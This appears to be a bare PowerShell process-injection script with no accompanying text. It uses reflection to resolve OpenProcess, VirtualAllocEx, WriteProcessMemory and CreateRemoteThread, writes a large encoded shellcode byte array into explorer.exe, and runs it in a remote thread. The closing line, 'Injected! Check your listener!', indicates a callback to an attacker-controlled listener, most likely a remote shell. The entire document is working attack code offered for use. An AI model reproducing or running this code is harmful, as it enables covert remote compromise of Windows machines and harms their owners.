function LookupFunc { Param ($moduleName, $functionName) $assem = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1]. Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') $tmp=@() $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}} return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null, @($moduleName)), $functionName)) } function getDelegateType { Param ( [Parameter(Position = 0, Mandatory = $True)] [Type[]] $func, [Parameter(Position = 1)] [Type] $delType = [Void] ) $type = [AppDomain]::CurrentDomain. DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('InMemoryModule', $false). DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) $type. DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $func). SetImplementationFlags('Runtime, Managed') $type. DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func). SetImplementationFlags('Runtime, Managed') return $type.CreateType() } $procId = (Get-Process explorer).Id [Byte[]] $buf = 0xda,0xca,0xbf,0xcd,0xce,0xa3,0x8d,0xd9,0x74,0x24,0xf4,0x58,0x2b,0xc9,0x66,0xb9,0x1e,0x1,0x31,0x78,0x19,0x3,0x78,0x19,0x83,0xd,0xca,0x41,0x78,0x54,0x17,0x3e,0xf0,0xcd,0xab,0xf6,0x2e,0x65,0xe8,0xc,0x88,0xac,0x39,0x8a,0x90,0xb8,0xb8,0x62,0xbb,0xd8,0x39,0x6c,0xc7,0xe3,0x65,0x75,0xda,0x65,0xe5,0x61,0x15,0x9f,0xeb,0xfe,0x39,0x80,0x72,0x70,0x1a,0xba,0x2c,0x8b,0xc4,0x41,0x45,0xa,0xab,0x5d,0x31,0x85,0x46,0x94,0x62,0x5d,0x45,0xaf,0x55,0x12,0x22,0x87,0xf6,0xa2,0x5d,0xfe,0x8c,0x27,0x64,0x6,0x6e,0xd2,0x2,0xf3,0xf5,0xc3,0x65,0xfe,0xe1,0xbc,0x9f,0x37,0x7a,0x97,0xcf,0x4c,0xca,0xf9,0x62,0x38,0xe7,0xfa,0x9f,0x47,0xdf,0x97,0x0,0x37,0x57,0xe7,0x80,0x37,0xbb,0x5b,0x91,0xaf,0x7f,0xc6,0xa5,0x46,0x76,0xb,0x6,0x1e,0x5,0x15,0xbc,0xf9,0x20,0xe6,0x36,0x1a,0xf0,0xb9,0x40,0xf9,0xac,0x2e,0xa3,0xa8,0xe5,0xfc,0xcf,0x32,0xc3,0xdb,0x1,0xa1,0x1a,0x39,0x31,0xc4,0x83,0x41,0xde,0x76,0x8b,0x50,0xfb,0x98,0xed,0xbd,0xdb,0x5b,0x21,0x5a,0xc9,0x53,0xfb,0x9d,0x66,0x53,0xd1,0xe8,0xb6,0x91,0x85,0x35,0x80,0x41,0x9b,0x4c,0x9f,0xbb,0xe2,0x90,0x61,0x2d,0x19,0xc6,0x4d,0xfd,0xa9,0xbc,0x92,0x76,0x60,0x8d,0xc,0x14,0x20,0x92,0xc5,0xe4,0x2c,0x1a,0x27,0x26,0xcd,0xb9,0x57,0xa7,0xd0,0xf8,0xcb,0xff,0xa,0x2b,0xda,0xee,0x2a,0xd3,0xfa,0x43,0x86,0x51,0x82,0xfb,0x9e,0x96,0x9d,0xd9,0x31,0xa,0x36,0x49,0xe4,0x53,0x7f,0x85,0x9a,0xef,0xe1,0x3e,0xf,0xc1,0xf,0xd7,0x8,0x71,0x50,0x87,0x7,0x4e,0xff,0x69,0xc1,0xea,0x64,0x67,0x5c,0x59,0x9a,0x60,0x91,0x59,0xc1,0x97,0x3c,0xc1,0x5f,0x14,0x6b,0x3a,0xcc,0x73,0x2b,0xfd,0x76,0xef,0xc7,0x3b,0xec,0xb9,0x2d,0x15,0xec,0xff,0x16,0x23,0x55,0x41,0x68,0xb2,0xda,0x62,0xaa,0x3a,0x80,0x19,0x2f,0x7f,0x4b,0x87,0x68,0xd6,0x43,0xec,0xf6,0xde,0x5b,0xfa,0x32,0xa5,0xad,0x87,0x43,0xd9,0xfa,0xfa,0x2d,0x90,0x91,0x4e,0x72,0xb0,0xe3,0x9f,0x52,0x16,0x25,0x70,0x66,0x51,0x77,0xe7,0x1e,0x33,0xcf,0x7d,0xbb,0x80,0xdc,0xdd,0x23,0x43,0x77,0x48,0xa1,0x47,0xd3,0xb3,0xff,0xf,0x55,0x51,0x86,0xb,0x5d,0x5f,0xb2,0x74,0x19,0xcc,0x68,0xa9,0xc4,0x23,0x4f,0x5b,0x62,0x29,0x1f,0x21,0xf9,0x68,0x2d,0xa2,0x17,0xd2,0xac,0xea,0x8d,0xd3,0xc2,0xb7,0x97,0x40,0xf6,0x43,0xbe,0xf1,0x19,0x16,0x28,0x3,0xcb,0x20,0xa9,0x87,0x11,0xb6,0xf9,0x98,0xf1,0x89,0xf9,0x7d,0xd1,0x39,0x2b,0x7b,0xcc,0x70,0x69,0x2f,0xad,0xfb,0x1,0xb7,0x69,0xa7,0x83,0xe8,0xd6,0x9c,0xc6,0x30,0xd1,0x6d,0xf4,0x3c,0x9f,0x63,0xb6,0x10,0x4f,0x15,0x78,0x38,0x43,0x42,0x75,0xe7,0xad,0x4e,0xc,0x4,0x1e,0x53,0xe5,0x4d,0xb0,0x5c,0x79,0x77,0x4e,0xa9,0x8b,0xc3,0x2e,0xc7,0xb,0xae,0x9b,0xfd,0xb9,0xa6,0xbc,0x3f,0x4a,0x83,0x15,0x68,0x87,0x26,0xee,0xd0,0x56,0xb2,0xc0,0x63,0x94,0x21,0xe5,0xe4,0xfa,0xb1,0xa9,0xa0,0xc6,0x7,0x24,0x3,0x3,0x4a,0x22,0x43,0xcd,0x13,0x4d,0x74,0x9c,0x51,0xb2,0x35,0xe1,0x3a,0x3d,0x70,0x94,0xee,0x25,0x8b,0xc4,0x95,0x19,0x2,0xc8,0xc5,0xce,0xa4,0x32,0x57,0xb3,0xe4,0xb9,0xbb,0xe7,0x9d,0x9d,0x90,0xd,0x2c,0x9,0x5a,0x2f,0xe0,0xa0,0xfb,0xec,0xe6,0x13,0x65,0x68,0xd9,0xf9,0xae,0xba,0x74,0xdb,0xb5,0xe6,0xe8,0x2e,0xb5,0x8f,0x99,0x7d,0x32,0xa9,0x9,0x9b,0x2e,0x64,0xe5,0x22,0x3,0xc3,0xe6,0xa7,0xa3,0xb,0x18,0x3,0x5a,0x6b,0x82,0xb0,0x5c,0x92,0xb,0x9,0x7b,0x40,0x3f,0x45,0xd6,0x74,0xc4,0x23,0x87,0x17,0x17,0x72,0x3,0x95,0x4a,0x8,0xf9,0x5d,0xb,0x43,0x35,0xb3,0xc5,0x71,0x87,0xee,0xab,0x38,0xdb,0x7a,0x64,0x6a,0x7b,0x28,0x15,0x84,0xa6,0x38,0xf7,0x6e,0xd4,0xeb,0x65,0xb8,0x44,0x9c,0x37,0xfe,0xd0,0xb4,0x6d,0xed,0x9d,0x1,0x9c,0x73,0x72,0x68,0x41,0xea,0x4d,0xeb,0x87,0xd4,0x19,0x6f,0x5e,0xca,0xa,0x33,0xbd,0xf7,0x81,0xce,0x1f,0xcd,0x93,0x13,0x88,0x73,0x92,0xfe,0x3c,0x94,0x3d,0x5b,0xa2,0x51,0x19,0x27,0x2e,0x5c,0x5b,0xaf,0xd0,0x24,0xdd,0x56,0x1f,0xb5,0xba,0x9,0x42,0x20,0xae,0x84,0x8f,0xcb,0x0,0x61,0x6,0x72,0x72,0x83,0xf1,0xf,0xac,0x20,0x74,0xd,0x1b,0x6,0x7f,0x79,0x7,0x99,0x54,0xba,0x27,0x2e,0x16,0x25,0xcf,0xdc,0xda,0xd7,0xf5,0xca,0xc9,0x89,0x72,0x7e,0xed,0xe7,0x62,0xe9,0x0,0x33,0xf8,0x8d,0x92,0x42,0x22,0xbf,0x4f,0xc8,0xfc,0x1c,0xfa,0x96,0xb4,0x71,0x25,0x4f,0xaa,0x8,0xb,0xd0,0x27,0xbc,0x50,0xb5,0x9,0xef,0x50,0x96,0x32,0x51,0xee,0x3e,0x30,0x1a,0x4d,0xfc,0xa5,0x75,0x87,0x29,0xfa,0xd0,0x5a,0xca,0xf5,0x79,0x70,0x46,0x16,0xff,0xa6,0x5f,0x47,0x16,0x2,0x6d,0x9d,0x80,0x2a,0x9d,0x41,0xc4,0x66,0x95,0xe4,0x4,0xe4,0x4f,0x2f,0x48,0x9b,0x44,0xe0,0x4f,0xda,0xfd,0x88,0x97,0x8d,0xe5,0x80,0x73,0xed,0x8,0x56,0x1,0x2f,0x58,0x76,0xcd,0xbf,0x52,0xb6,0xfc,0x0,0xe5,0x94,0xe5,0x61,0xca,0x9,0xef,0x35,0xd7,0xa9,0x7a,0x41,0xc5,0xed,0x60,0xa,0x72,0xe1,0xdd,0xc,0x71,0x41,0xe,0x52,0x81,0x6d,0x30,0x6a,0xb1,0x12,0xee,0x35,0xd2,0xc4,0x89,0xbd,0x13,0x91,0xb8,0x8a,0x39,0x96,0x70,0xc2,0x1c,0x83,0xb,0xd6,0x9e,0x29,0xbe,0x3b,0xc7,0x7d,0xda,0xe3,0x36,0x12,0xb2,0xd8,0x93,0xc9,0x14,0x1a,0xa4,0xd8,0x67,0x79,0x74,0x6d,0x34,0x52,0x86,0xf3,0x86,0x45,0xd0,0xd1,0xa2,0x88,0x32,0xe1,0x1f,0x82,0x1a,0xc1,0x64,0xe5,0x45,0x22,0x4d,0xcb,0x59,0x60,0xc7,0x6b,0x33,0xc0,0x73,0x1e,0x25,0x75,0x99,0xcf,0x24,0x9,0x5b,0xbf,0x4b,0x71,0x97,0x0,0x49,0x28,0x5d,0x94,0x4e,0x77,0x92,0xe3,0x84,0x8c,0x21,0xc2,0xcc,0x5a,0xa,0x82,0xea,0x52,0x98,0x0,0xcb,0x43,0xd4,0x31,0xdc,0x91,0xb9,0xca,0xe0,0x7c,0xe,0x2b,0x82,0x35,0x82,0xd9,0x7b,0x3a,0x7f,0x43,0x7a,0xa8,0xd1,0xa2,0xc5,0xe,0xde,0x77,0xa7,0x40,0x8b,0x80,0x90,0x50,0xe7,0xfd,0x3c,0xbe,0x49,0x65,0x97,0x8b,0x3c,0x9e,0x80,0x2c,0xf5,0xe8,0x3f,0xbd,0x14,0x0,0x11,0x4c,0x49,0x57,0x98,0x95,0xc4,0x75,0x5b,0xff,0x43,0xd3,0xfe,0x6,0xbf,0xb8,0xf5,0xc,0x2a,0xf8,0x9d,0xaa,0x22,0x30,0x27,0x3,0xd9,0xaf,0x43,0x67,0x7e,0x50,0x24,0x7b,0xf3,0xcd,0x79,0x57,0xe7,0xaf,0xad,0xe8,0xf5,0x60,0xb0,0x36,0xcc,0x12,0xb0,0xa4,0x63,0xb7,0x9c,0xeb,0xed,0xa7,0x61,0xd0,0xfd,0x5b,0x53,0x92,0x28,0x33,0x2,0xd6,0x77,0x1a,0x33,0x4e,0x99,0x94,0xbc,0x75,0x6a,0x8d,0x89,0x84,0x32,0x41,0xb9,0xd4,0x9c,0x52,0x84,0xa,0x16,0xcb,0x22,0xc2,0x14,0x84,0x81,0x4d,0xd4,0x70,0x5e,0x30,0x6b,0x91,0x27,0xff,0x7,0xb3,0x31,0xfb,0xa2,0xf,0xd3,0x76,0xc8,0xfb,0xa7,0xac,0xfd,0xdc,0xf5,0x3c,0x12,0xfa,0x43,0x7d,0xd1,0xb8,0x34,0xf3,0x69,0x47,0x95,0x5d,0xe9,0xa9,0x14,0x1,0x54,0x90,0x95,0x7d,0xa,0x22,0x2a $hProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll OpenProcess), (getDelegateType @([UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke(0x001F0FFF, 0, $procId) $expAddr = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAllocEx), (getDelegateType @([IntPtr], [IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke($hProcess, [IntPtr]::Zero, [UInt32]$buf.Length, 0x3000, 0x40) $procMemResult = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll WriteProcessMemory), (getDelegateType @([IntPtr], [IntPtr], [Byte[]], [UInt32], [IntPtr])([Bool]))).Invoke($hProcess, $expAddr, $buf, [Uint32]$buf.Length, [IntPtr]::Zero) [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateRemoteThread), (getDelegateType @([IntPtr], [IntPtr], [UInt32], [IntPtr], [UInt32], [IntPtr]))).Invoke($hProcess, [IntPtr]::Zero, 0, $expAddr, 0, [IntPtr]::Zero) Write-Host "Injected! Check your listener!"